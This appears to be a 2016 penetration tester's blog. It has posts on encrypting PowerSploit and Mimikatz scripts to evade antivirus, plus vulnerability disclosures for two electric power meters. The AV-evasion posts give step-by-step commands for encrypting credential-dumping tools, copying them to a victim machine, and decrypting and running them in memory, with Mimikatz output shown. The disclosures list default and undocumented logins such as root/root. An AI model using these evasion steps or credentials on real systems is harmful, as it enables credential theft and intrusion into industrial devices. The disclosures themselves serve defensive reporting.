Friday, December 30, 2016

[Video] Threat Actor Techniques

Threat Actor Techniques
Presented by Jeremy Junginger at FIRST security conference 2014

This demo presents a realistic attack scenario exhibiting some of the methods and techniques used by threat actors to compromise an internal network, from the Internet.
XSS - Restricted shell - Privileged shell - Hashes - Domain PWN - Network Attacks - Game Over!


Wednesday, October 19, 2016

New Powershell Mass Encrypt and Decrypt modules

New Powershell Mass Encrypt and Decrypt modules

These scripts are sourced from / wrappers around PowerSploit's Out-Encrypted.ps1 script.

PowerSploit's Out-Encrypted.ps1 handles / encrypts one script at a time; encrypted file needs to be decrypted manually and then executed.

Using PS-MassEncScript.ps1, encrypt multiple scripts with a password and a salt value, in one go.

Move the encrypted files over to the target / compromised box. Since these files are encrypted, AV / IPS are no good - at least as of now.

Use PS-DecScript.ps1 to decrypt & execute any of these encrypted files.

See the example script runs below:

On Attacker's box

C:\ps_stuff>dir *.ps1
 Volume in drive C has no label.
 Volume Serial Number is 6CCE-B154

 Directory of C:\ps_stuff

10/19/2016  06:51 AM             4,850 Out-EncryptedScript.ps1
10/06/2016  04:42 AM             1,663 PS-DecScript.ps1
10/19/2016  01:56 AM             3,267 PS-MassEncScript.ps1
               3 File(s)          9,780 bytes
               0 Dir(s)  45,774,680,064 bytes free

C:\ps_stuff>dir scripts            <--- directory where all scripts to be encrypted are stored
 Volume in drive C has no label.
 Volume Serial Number is 6CCE-B154

 Directory of C:\ps_stuff\scripts

10/19/2016  07:07 AM    <DIR>          .
10/19/2016  07:07 AM    <DIR>          ..
09/09/2016  12:06 PM             8,863 Get-LSASecret.ps1
09/09/2016  11:46 AM            14,948 Get-PassHashes.ps1
09/09/2016  11:38 AM         1,271,440 Invoke-Mimikatz.ps1
               3 File(s)      1,295,251 bytes
               2 Dir(s)  45,776,424,960 bytes free


Normally, an AV will immediately flag these scripts, remove and / or block script execution.

Encrypt these scripts using PS-MassEncScript.

Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\ps_stuff> 

Step 1 -> Import PS-MassEncScript.ps1
PS C:\ps_stuff> Import-Module C:\ps_stuff\PS-MassEncScript.ps1

Step 2 -> Execute PS-MassEncScript.ps1 with 4 parameters
PS C:\ps_stuff> PS-MassEncScript C:\ps_stuff\Out-EncryptedScript.ps1 C:\ps_stuff\scripts password salt

argument 1 -> C:\ps_stuff\Out-EncryptedScript.ps1 -> path to Out-EncryptedScript.ps1
argument 2 -> C:\ps_stuff\scripts -> path to scripts that you want to encrypt
argument 3 -> password
argument 4 -> salt

PS C:\ps_stuff> dir .\scripts

    Directory: C:\ps_stuff\scripts

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---          9/9/2016  12:06 PM       8863 Get-LSASecret.ps1
-a---        10/19/2016   7:10 AM      12809 Get-LSASecret_evil.ps1
-a---          9/9/2016  11:46 AM      14948 Get-PassHashes.ps1
-a---        10/19/2016   7:10 AM      20925 Get-PassHashes_evil.ps1
-a---          9/9/2016  11:38 AM    1271440 Invoke-Mimikatz.ps1
-a---        10/19/2016   7:10 AM    1696253 Invoke-Mimikatz_evil.ps1

PS C:\ps_stuff>

As you see above, the output encrypted scripts will be appended with a _evil suffix.

On the victim box:

Assuming you already have a cmd shell access, move these encrypted files on the victim box.

.\PS-Decrypt.ps1 <evil script name> password salt 'Command passed to evil ps1 script'

PS C:\victim> .\PS-DecScript.ps1 .\Invoke-Mimikatz_evil.ps1 password salt 'Inv
oke-Mimikatz -DumpCreds'
Executing .\Invoke-Mimikatz_evil.ps1

  .#####.   mimikatz 2.1 (x86) built on Feb 21 2016 18:42:23
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( )
 '## v ##'             (oe.eo)
  '#####'                                     with 17 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 117741 (00000000:0001cbed)
Session           : Interactive from 1
User Name         : Administrator
Domain            : win7ent-01-lab
Logon Server      : WIN7ENT-01-LAB
Logon Time        : 10/19/2016 6:47:25 AM
SID               : S-1-5-21-3784992239-1999550448-2462781864-500
        msv :

PS C:\victim> .\PS-DecScript.ps1 .\Get-PassHashes_evil.ps1 password salt 'Get-
Executing .\Get-PassHashes_evil.ps1
<hash dump>

PS C:\victim>


Thursday, September 15, 2016

[ICS] BINOM3 Electric Power Quality Meter - Multiple Vulnerabilities

[ICS] Universal multifunctional Electric Power Quality Meter BINOM3 - Multiple Vulnerabilities


The meters are designed for autonomous operation in automated systems: 
• SCADA systems
• Data aquisition and transmission systems
• Automated data and measurement systems for revenue and technical power metering 
• Power quality monitoring and control systems
• Automated process control systems, Management information system

Submitted to ICS-CERT - May 25, 2016
No response from vendor till date.
Vulnerability Information

Web Management Portal

1. Reflected XSS – multiple urls, parameters 
Successful exploitation of this vulnerability could allow an unauthenticated and authenticated, attacker to inject arbitrary JavaScript in a specially crafted URL request where the response containing user data is returned to the web browser without being made safe to display.

2. Stored XSS – multiple urls, parameters 
Successful exploitation of this vulnerability could allow an authenticated attacker to inject arbitrary JavaScript in specific input fields, which get stored in the underlying db, and once accessed, the data including malicious scripts, is returned to the web browser leading to script execution.

3. Weak Credentials Management 
The device comes configured with four (4) login accounts:
- admin / 1 
- user / 1 
- alg / 1 
- telem / 1

- These passwords do not meet even basic security criterion.
- To further make it easier for attacker(s), the application design does not provide the users, any option to change their own passwords in device management portal. Only 'root' can change passwords for all other accounts. (AFAIK)

4. Undocumented root account 
In addition to the above four documented login accounts, there is a 'root' superuser account:
- root / root
- root account details are not documented in the device administration guide or manuals
- root account has multiple, additional functions accessible like user management

5. Sensitive Information stored in clear-text 
Sensitive information, specifically, the account passwords, are all stored and shown in clear-text.

Additionally, specific non-root, non-privileged users can access complete device configuration file, which contains clear-text passwords and other config information. This flaw can be used to gain privileged access to the device.

6. Vulnerable to Cross-Site Request Forgery 

There is no CSRF Token generated per page and / or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration. 

7. Sensitive information leakage

Every time ‘root’ logs in, a GET request is made to a specific url to access password configuration file.

Response comes as xml data, and contains all accounts and their passwords. Since, by default, the management portal is configured for HTTP, a suitably positioned attacked can sniff all login credentials, and gain privileged access.


1. Access Control Flaws 
By default, password authentication is not enabled on Telnet access (AFAIK).
- This access gives superuser-level access to device
- Access to the device provides detailed info on application, configuration, device file system, databases (including Energy & billing), consumption, Statistics, network information, as well as clear-text creds (FTP)
- Easy vector to device & data compromise


Saturday, September 10, 2016

[Quick Notes] Powersploit - AV Evasion

[Quick Notes] Powersploit - AV Evasion

On my pentest engagements, I primarily use Powershell (PS) & PS based exploitation tools & frameworks like CME, Empire, Powersploit, Nishang, Veil, etc, along with Metasploit & other tools.

This short writeup is one of the AV evasion scenarios. Posting here for reference.

Objective is to dump hashes & clear-text passwords from memory (use Mimikatz). Any decent Anti-Virus blocks any attempts to read / update / execute Invoke-Mimikatz.ps1.

Enter - PowerSploit's Out-EncryptedScript.ps1. Use the script to encrypt the any malicious file (text/ps1) offline (attacker's box) and upload it to the target. The script takes in a password and a salt to encrypt the file.

Out-EncryptedScript will encrypt a script (or any text file for thatmatter) and output the results to a minimally obfuscated script -evil.ps1 by default.
Out-EncryptedScript .\Invoke-Mimikatz.ps1 password salty

A new, encrypted ps script - evil.ps1 - is generated.

Read the file contents and execute the script from memory.
[String] $cmd = Get-Content .\evil.ps1Invoke-Expression $cmd$decrypted = de password saltyiex $decrypted; Invoke-Mimikatz -DumpCreds

Invoke-Mimikatz.ps1 executes successfully.


Tuesday, September 6, 2016

[ICS] ELNet Energy meter & Electrical powermeter - multiple vulnerabilities

ELNet Energy meter & Electrical Powermeter - Multiple Vulnerabilities

Powermeter with color graphic display for all electrical measurements and harmonics, with TCP/IP and RS485 communication (ModBus and Bacnet), panel mounted 96X96 mm.

Product Description
Simple operated menus.
  • Multilingual support.
  • Up to One year of energy data logging.
  • Displays up to 64th Harmonic in Waveform or Graphic.
  • 1600 samples per cycle.
  • Accuracy 0.2 %.
  • Accuracy 0.1% with special calibration, that can be ordered.
  • Build in T.O.U. Energy meter.
  • RS485 Communication Port (MODBUS, Bacnet MS/TP).
  • State of the art Graphic LCD
  • Modern 320 x 240 LCD display.
  • Displays of Waveform and Bar graph.
  • Simple installation- Panel mounted. Dimension: 96×96 mm.
  • Flash memory stores 6 months of energy.
  • TCP/IP communication port + WEB server
  • BacNet TCP/IP
Standard approvals:
IEC 62053-22, IEC 62053-23, IEC 62052-11

Large consumers of electricity e.g. factories, hotels, hospitals, municipalities, need to know the history of their consumption and the quality and the values of the power supply. Details such as Voltage, Current, Power Factor, Hertz, Neutral Current, Energy consumption can be displayed by the ELNet LT
Energy & Powermeter.

An additional feature of the Powermeter is the ability to measure Harmonics. Part of the Electricity Supply Authority’s bill reflects poor or good Harmonics in the consumer’s system, therefore it is in his interest to monitor Harmonics and try to improve it.

The ELNet LT Energy & Powermeter is a compact, multi functional, three-phase Powermeter simple to install and is especially designed to integrate into Building Management Systems. It requires no special mounting and is ideally suited for mounting on the front face of any standard electrical panel.

The Configuration and Setup is menu driven, with password protection.

Reported to vendor - June 2016
- vendor acknowledged the issues & ceased the communication after initial discussion.
Reported to ICS-CERT - July 2016
- acknowledged report

Issues observed

1. Unauthenticated Web Management access

ELNet power meters can be managed via Java applet over a web browser. Meter console and all its functions are accessible.

By default, no authentication is required to access the web console.

2. Weak Credential Management
In order to perform certain specific functions in ELNet power meters, passwords are required. These passwords are, really just a formality.

For example:

Default password code to access Technical Menu for device configuration is –
1 (One)

Default password – 6474
- To reset I,V,F Peak Values
- To display /reset power peak value

It appears that password/code functionality is implemented for the sake of getting the compliance check-list ticked.

Not only the default passwords are poor/weak, the system does not have a mechanism to enforce a mandatory password change.

<rant> What's the need of a password change.? It is just a meter. </rant>

3. Password Recovery Functionality

But what if, just what if, someone does change the default passwords, and forgets??

According to vendor:
It is not recommended to forget your new passwords.

Yeah, wtf.

The manual doesn't seem to document Password Recovery. I didn't find it anyway.

Is this bad? Well, let's say Bob accesses the meter via a browser (applet), uses default passcodes to change all passcodes, resets the stats / data, reboots the meter, and goes back to sipping his moonshine. Would be fun..



The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.